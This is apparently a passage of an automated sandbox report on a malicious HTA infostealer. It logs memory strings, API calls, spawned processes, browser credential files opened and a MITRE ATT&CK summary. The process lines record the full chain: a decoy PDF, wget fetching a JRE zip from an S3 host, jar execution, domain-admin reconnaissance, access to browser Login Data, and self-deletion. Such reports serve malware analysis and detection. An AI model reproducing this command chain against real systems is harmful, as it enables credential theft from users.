Source: mshta.exe, 00000000.00000003.2199936338.000000000D8B5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2202654128.000000000CFD8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2183541360.000000000C98A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2182281973.000000000C98C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2203539288.000000000C13C000.00000004.00000020.00020000.00000000.sdmp, wget.exe, 0000000B.00000000.2222201108.0000000000B9E000.00000002.00000001.01000000.0000000B.sdmp	Binary or memory string: C:/msys64/qemu/opt/misc-i686/etc/wgetrcParsing system wgetrc file failed. Please check
Source: javaw.exe, 0000001F.00000003.3269958275.0000000014865000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: com/sun/corba/se/impl/util/SUNVMCID.classPK
Source: javaw.exe, 00000010.00000002.3208367361.000000006D6F6000.00000002.00000001.01000000.00000010.sdmp, javaw.exe, 00000013.00000002.3224057643.000000006D6F6000.00000002.00000001.01000000.00000010.sdmp	Binary or memory string: java/lang/VirtualMachineError
Source: mshta.exe, 00000000.00000003.2202654128.000000000D42A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2182281973.000000000CDDE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2200525572.000000000D939000.00000004.00000020.00020000.00000000.sdmp, wget.exe, 0000000B.00000002.3047917243.0000000000BD5000.00000002.00000001.01000000.0000000B.sdmp	Binary or memory string: C:/msys64/qemu/opt/misc-i686/lib/ossl-modules
Source: javaw.exe, 0000001F.00000003.3269958275.0000000014865000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: )I&com/sun/corba/se/impl/util/SUNVMCID.classPK
Source: wget.exe, 0000000B.00000002.3047917243.0000000000BD5000.00000002.00000001.01000000.0000000B.sdmp	Binary or memory string: .crypto/provider_conf.csection=%s not foundidentitysoft_loadmoduleactivateprovidersprovider_conf_activateprovider_conf_loadprovider_conf_initcrypto/provider_core.copenssl-version3.1.0provider-namemodule-filenameOPENSSL_MODULESC:/msys64/qemu/opt/misc-i686/lib/ossl-modulesC:/msys64/qemu/opt/misc-i686/binname=%sOSSL_provider_initname=%s, provider has no provider init function
Source: wget.exe, 0000000B.00000002.3047917243.0000000000BD5000.00000002.00000001.01000000.0000000B.sdmp	Binary or memory string: zlib compression(undef)crypto/comp/comp_lib.cCOMP_CTX_newcrypto/conf/conf_mod.cconfig_diagnosticsopenssl_confopenssl_conf=%spathOPENSSL_initOPENSSL_finishmodule=%s, path=%smodule=%smodule=%s, value=%s retcode=%-8dOPENSSL_CONFopenssl.cnf/%s%s%sCONF_parse_listmodule_initmodule_addmodule_load_dsodo_init_module_list_lockmodule_runCONF_modules_loadcrypto/conf/conf_ssl.csection=%sname=%s, value=%sssl_confssl_module_initcrypto/ct/ct_log.cdescriptionkeyenabled_logsC:/msys64/qemu/opt/misc-i686/ssl/ct_log_list.cnfCTLOG_FILESHA2-256ct_v1_log_id_from_pkeyCTLOG_new_exctlog_store_load_ctx_newctlog_new_from_confctlog_store_load_logCTLOG_STORE_load_fileCTLOG_STORE_new_excrypto/ct/ct_oct.ci2o_SCT_LISTo2i_SCT_LISTi2o_SCTi2o_SCT_signatureo2i_SCTo2i_SCT_signaturecrypto/ct/ct_policy.cCT_POLICY_EVAL_CTX_new_excrypto/ct/ct_sct.cSCT_set1_signatureSCT_set1_extensionsSCT_set_signature_nidSCT_set1_log_idSCT_set0_log_idSCT_set_log_entry_typeSCT_set_versionSCT_newcrypto/ct/ct_sct_ctx.cSHA2-256SCT_CTX_newcrypto/ct/ct_vfy.cSHA2-256SCT_CTX_verifydes(long)
Source: mshta.exe, 00000000.00000003.2199936338.000000000D8B5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2202654128.000000000CFD8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2183541360.000000000C98A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2182281973.000000000C98C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2203539288.000000000C13C000.00000004.00000020.00020000.00000000.sdmp, wget.exe, 0000000B.00000000.2222201108.0000000000B9E000.00000002.00000001.01000000.0000000B.sdmp	Binary or memory string: C:/msys64/qemu/opt/misc-i686/etc/wgetrc
Source: javaw.exe, 00000010.00000002.3208367361.000000006D6F6000.00000002.00000001.01000000.00000010.sdmp, javaw.exe, 00000013.00000002.3224057643.000000006D6F6000.00000002.00000001.01000000.00000010.sdmp	Binary or memory string: fmSize of %s (%u bytes) must be aligned to %u bytes-2147483648C:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u431\1359\hotspot\src\share\vm\memory\universe.cppGenesisCould not reserve enough space for %uKB object heap32-bitZero basedNon-zero basedUnable to link/verify VirtualMachineError classCompressed class spaceJava heap space: failed reallocation of scalar replaced objectsUnable to link/verify Finalizer.register methodUnable to link/verify Unsafe.throwIllegalAccessError methodUnable to link/verify ClassLoader.addClass methodProtectionDomain.impliesCreateAccessControlContext() has the wrong linkageHeap{Heap before GC invocations=%u (full %u):Heap after GC invocations=%u (full %u): ,heapsymbol_tablestring_tablecodecachedictionaryclassloader_data_graphjni_handlescodecache_oopsVerifySubSet: '%s' memory sub-system is unknown, please correct it[Verifying Threads Heap SymbolTable StringTable CodeCache SystemDictionary MetaspaceAux JNIHandles CodeCache Oops <
Source: mshta.exe, 00000000.00000003.2199936338.000000000D8B5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2202654128.000000000CFD8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2183541360.000000000C98A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2182281973.000000000C98C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2203539288.000000000C13C000.00000004.00000020.00020000.00000000.sdmp, wget.exe, 0000000B.00000000.2222201108.0000000000B9E000.00000002.00000001.01000000.0000000B.sdmp	Binary or memory string: gcc -DHAVE_CONFIG_H -DSYSTEM_WGETRC="/opt/misc-i686/etc/wgetrc" -DLOCALEDIR="/opt/misc-i686/share/locale" -I. -I../../src -I../lib -I../../lib -I/opt/misc-i686/include -IC:/msys64/qemu/opt/misc-i686/include -IC:/msys64/qemu/opt/misc-i686/include -IC:/msys64/qemu/opt/misc-i686/include -DCARES_STATICLIB -IC:/msys64/qemu/opt/misc-i686/include -DPCRE2_STATIC -IC:/msys64/qemu/opt/misc-i686/include -IC:/msys64/qemu/opt/misc-i686/include -DHAVE_LIBSSL -I -IC:/msys64/qemu/opt/misc-i686/include -DNDEBUG -ggdb -mtune=broadwell -mtune=znver2 -O2 -pipe
Source: mshta.exe, 00000000.00000003.2202654128.000000000D42A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2182281973.000000000CDDE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2200525572.000000000D939000.00000004.00000020.00020000.00000000.sdmp, wget.exe, 0000000B.00000002.3047917243.0000000000BD5000.00000002.00000001.01000000.0000000B.sdmp	Binary or memory string: C:/msys64/qemu/opt/misc-i686/ssl/private
Source: mshta.exe, 00000000.00000003.2200629700.000000000D8F6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2202654128.000000000D42A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2199936338.000000000D8F6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2182281973.000000000CDDE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2200074325.000000000D8F6000.00000004.00000020.00020000.00000000.sdmp, wget.exe, 0000000B.00000002.3047917243.0000000000BD5000.00000002.00000001.01000000.0000000B.sdmp	Binary or memory string: C:/msys64/qemu/opt/misc-i686/lib/users-3
Source: mshta.exe, 00000000.00000003.2200629700.000000000D8F6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2199936338.000000000D8F6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2200074325.000000000D8F6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ySzlib compression(undef)crypto/comp/comp_lib.cCOMP_CTX_newcrypto/conf/conf_mod.cconfig_diagnosticsopenssl_confopenssl_conf=%spathOPENSSL_initOPENSSL_finishmodule=%s, path=%smodule=%smodule=%s, value=%s retcode=%-8dOPENSSL_CONFopenssl.cnf/%s%s%sCONF_parse_listmodule_initmodule_addmodule_load_dsodo_init_module_list_lockmodule_runCONF_modules_loadcrypto/conf/conf_ssl.csection=%sname=%s, value=%sssl_confssl_module_initcrypto/ct/ct_log.cdescriptionkeyenabled_logsC:/msys64/qemu/opt/misc-i686/ssl/ct_log_list.cnfCTLOG_FILESHA2-256ct_v1_log_id_from_pkeyCTLOG_new_exctlog_store_load_ctx_newctlog_new_from_confctlog_store_load_logCTLOG_STORE_load_fileCTLOG_STORE_new_excrypto/ct/ct_oct.ci2o_SCT_LISTo2i_SCT_LISTi2o_SCTi2o_SCT_signatureo2i_SCTo2i_SCT_signaturecrypto/ct/ct_policy.cCT_POLICY_EVAL_CTX_new_excrypto/ct/ct_sct.cSCT_set1_signatureSCT_set1_extensionsSCT_set_signature_nidSCT_set1_log_idSCT_set0_log_id
Source: mshta.exe, 00000000.00000003.2199936338.000000000D8B5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2202654128.000000000CFD8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2183541360.000000000C98A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2182281973.000000000C98C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2203539288.000000000C13C000.00000004.00000020.00020000.00000000.sdmp, wget.exe, 0000000B.00000000.2222201108.0000000000B9E000.00000002.00000001.01000000.0000000B.sdmp	Binary or memory string: gcc -IC:/msys64/qemu/opt/misc-i686/include -IC:/msys64/qemu/opt/misc-i686/include -IC:/msys64/qemu/opt/misc-i686/include -DCARES_STATICLIB -IC:/msys64/qemu/opt/misc-i686/include -DPCRE2_STATIC -IC:/msys64/qemu/opt/misc-i686/include -IC:/msys64/qemu/opt/misc-i686/include -DHAVE_LIBSSL -I -IC:/msys64/qemu/opt/misc-i686/include -DNDEBUG -ggdb -mtune=broadwell -mtune=znver2 -O2 -pipe -L/opt/misc-i686/lib -LC:/msys64/qemu/opt/misc-i686/lib -lmetalink -LC:/msys64/qemu/opt/misc-i686/lib -lcares -LC:/msys64/qemu/opt/misc-i686/lib -lpcre2-8 -LC:/msys64/qemu/opt/misc-i686/lib -lidn2 -LC:/msys64/qemu/opt/misc-i686/lib -lssl -lcrypto -L -lz -LC:/msys64/qemu/opt/misc-i686/lib -lpsl -lws2_32 -lole32 -lcrypt32 -lexpat -LC:/msys64/qemu/opt/misc-i686/lib -lgpgme ../lib/libgnu.a -lws2_32 -lws2_32 -lws2_32 -lws2_32 /opt/misc-i686/lib/libiconv.a /opt/misc-i686/lib/libunistring.a /opt/misc-i686/lib/libiconv.a -lws2_32

Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe

Code function: 15_2_00423860 rdtsc

15_2_00423860

Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe

Code function: 16_2_00E1AAED IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

16_2_00E1AAED

Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe

Code function: 15_2_0041FE80 LoadLibraryA,GetProcAddress,strlen,malloc,strcpy,strcat,FindFirstFileExA,FindNextFileA,FindClose,FreeLibrary,FindFirstFileA,

15_2_0041FE80

Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe

Code function: 15_2_00423040 GetLogicalDriveStringsA,GetProcessHeap,HeapAlloc,GetLogicalDriveStringsA,

15_2_00423040

Source: C:\Windows\SysWOW64\whoami.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\whoami.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\whoami.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\whoami.exe	Process token adjusted: Debug

Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe	Code function: 15_2_00401079 SetUnhandledExceptionFilter,__getmainargs,_iob,_setmode,_iob,_setmode,_iob,_setmode,__p__fmode,__p__environ,_cexit,ExitProcess,	15_2_00401079
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 16_2_00E1AAED IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	16_2_00E1AAED
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 16_2_00E09C5D IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	16_2_00E09C5D
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 16_2_00E09DF0 SetUnhandledExceptionFilter,	16_2_00E09DF0
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 16_2_00E0954E SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	16_2_00E0954E
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 16_2_6D6F4C8A SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	16_2_6D6F4C8A
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 16_2_6FA55309 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	16_2_6FA55309
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 16_2_6FA55804 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	16_2_6FA55804
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 19_2_6FB46659 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	19_2_6FB46659
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 19_2_6FB4615E SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	19_2_6FB4615E
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 19_2_6FD6CC8F SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	19_2_6FD6CC8F
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 19_2_6FD6CAE8 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	19_2_6FD6CAE8
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 19_2_73F1F6DF SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	19_2_73F1F6DF
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 19_2_73F73DFC IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	19_2_73F73DFC
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 19_2_73F73907 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	19_2_73F73907
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 19_2_74AA5A05 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	19_2_74AA5A05
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 19_2_74AA634C IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	19_2_74AA634C

Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe

Memory protected: page read and write | page guard

Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" url.dll,FileProtocolHandler "C:\Users\user\Downloads\swiftcopy.pdf"	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\runMainSequence.bat"	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\swiftcopy.pdf"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\wget.exe "wget.exe" --user-agent="BlackBerry" -O "jre-1.8.zip" "https://seasonmonster.s3.us-east-1.amazonaws.com/jre-1.8.zip"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe "unzip.exe" "jre-1.8.zip" -d "jre"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe "jre\jre-1.8\bin\javaw.exe" -jar "jre\jre-1.8\lib\deploy\recovery.jar"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe "jre\jre-1.8\bin\javaw.exe" -jar "jre\jre-1.8\lib\deploy\history.jar"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe "jre\jre-1.8\bin\javaw.exe" -jar "jre\jre-1.8\lib\deploy\checker.jar"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cscript.exe cscript //nologo "C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\runResJar.vbs"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cscript.exe cscript //nologo "C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\runEmailJs.vbs"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cscript.exe cscript //nologo "C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\runDeleteHTA.vbs"
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic computersystem get domain
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\whoami.exe whoami /groups
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\whoami.exe whoami /groups
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\net.exe net group "Domain Admins" /domain
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 group "Domain Admins" /domain
Source: C:\Windows\SysWOW64\cscript.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe "C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe" -jar "C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\lib\deploy\res.jar"
Source: C:\Windows\SysWOW64\cscript.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\lib\deploy\email.js"
Source: C:\Windows\SysWOW64\cscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\deleteHTAandSelf.bat" "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 5 /nobreak

Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe

Code function: 19_2_6FB45360 _Java_sun_nio_fs_WindowsNativeDispatcher_SetSecurityDescriptorDacl@24,SetSecurityDescriptorDacl,GetLastError,

19_2_6FB45360

Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe

Code function: 16_2_00E09F05 cpuid

16_2_00E09F05

Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe	Code function: GetLocaleInfoA,	15_2_0041ACD0
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe	Code function: GetLocaleInfoA,	15_2_0041AD30
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: GetLocaleInfoEx,FormatMessageA,	19_2_6FD44DAB
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: __crtGetLocaleInfoEx,GetLocaleInfoEx,	19_2_6FD39C40
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: _Getdateorder,___lc_locale_name_func,GetLocaleInfoEx,	19_2_6FD55630

Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe

Code function: 15_2_00423D10 GetTimeZoneInformation,GetSystemTimeAsFileTime,_errno,

15_2_00423D10

Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe

Code function: 19_2_6FB44F6F _Java_sun_nio_fs_WindowsNativeDispatcher_LookupAccountName0@28,LookupAccountNameW,GetLastError,GetLastError,

19_2_6FB44F6F

Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe

Code function: 15_2_0040B130 GetTimeZoneInformation,localtime,_localtime32,

15_2_0040B130

Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe

Code function: 15_2_0041D741 GetVersion,

15_2_0041D741

Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\wget.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History

Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 16_2_6D51F540 _JVM_Bind@12,	16_2_6D51F540
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 16_2_6D52AD30 _JVM_Listen@8,	16_2_6D52AD30
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 16_2_6D5EACE0 listen,	16_2_6D5EACE0
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 16_2_6D5E73E0 bind,	16_2_6D5E73E0
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 16_2_6FA72EF8 Java_org_sqlite_core_NativeDB_bind_1parameter_1count,	16_2_6FA72EF8
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 16_2_6FA72ECD Java_org_sqlite_core_NativeDB_clear_1bindings,	16_2_6FA72ECD
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 16_2_6FA74250 Java_org_sqlite_core_NativeDB_set_1commit_1listener,malloc,	16_2_6FA74250
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 16_2_6FA74156 Java_org_sqlite_core_NativeDB_set_1update_1listener,malloc,	16_2_6FA74156
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 19_2_6FA52EEE Java_org_sqlite_core_NativeDB_bind_1parameter_1count,	19_2_6FA52EEE
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 19_2_6FA52EC3 Java_org_sqlite_core_NativeDB_clear_1bindings,	19_2_6FA52EC3
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 19_2_6FA54246 Java_org_sqlite_core_NativeDB_set_1commit_1listener,malloc,	19_2_6FA54246
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 19_2_6FA5414C Java_org_sqlite_core_NativeDB_set_1update_1listener,malloc,	19_2_6FA5414C
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 19_2_6FA53404 Java_org_sqlite_core_NativeDB_bind_1blob,	19_2_6FA53404
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 19_2_6FA5338E Java_org_sqlite_core_NativeDB_bind_1text_1utf8,	19_2_6FA5338E
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 19_2_6FA5330E Java_org_sqlite_core_NativeDB_bind_1long,	19_2_6FA5330E
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 19_2_6FA53353 Java_org_sqlite_core_NativeDB_bind_1double,	19_2_6FA53353
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 19_2_6FA532A3 Java_org_sqlite_core_NativeDB_bind_1null,	19_2_6FA532A3
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 19_2_6FA532D5 Java_org_sqlite_core_NativeDB_bind_1int,	19_2_6FA532D5
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 19_2_6FB42C57 _Java_sun_nio_ch_ServerSocketChannelImpl_listen@16,listen,WSAGetLastError,_NET_ThrowNew@12,	19_2_6FB42C57
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 19_2_6FB42A40 _Java_sun_nio_ch_Net_isExclusiveBindAvailable@8,GetVersionExA,	19_2_6FB42A40
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 19_2_6FB42697 _Java_sun_nio_ch_Net_bind0@28,_NET_InetAddressToSockaddr@24,_NET_WinBind@16,WSAGetLastError,_NET_ThrowNew@12,	19_2_6FB42697

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	112 Scripting	Valid Accounts	1 Windows Management Instrumentation	112 Scripting	1 DLL Side-Loading	1 Disable or Modify Tools	1 OS Credential Dumping	2 System Time Discovery	Remote Services	11 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
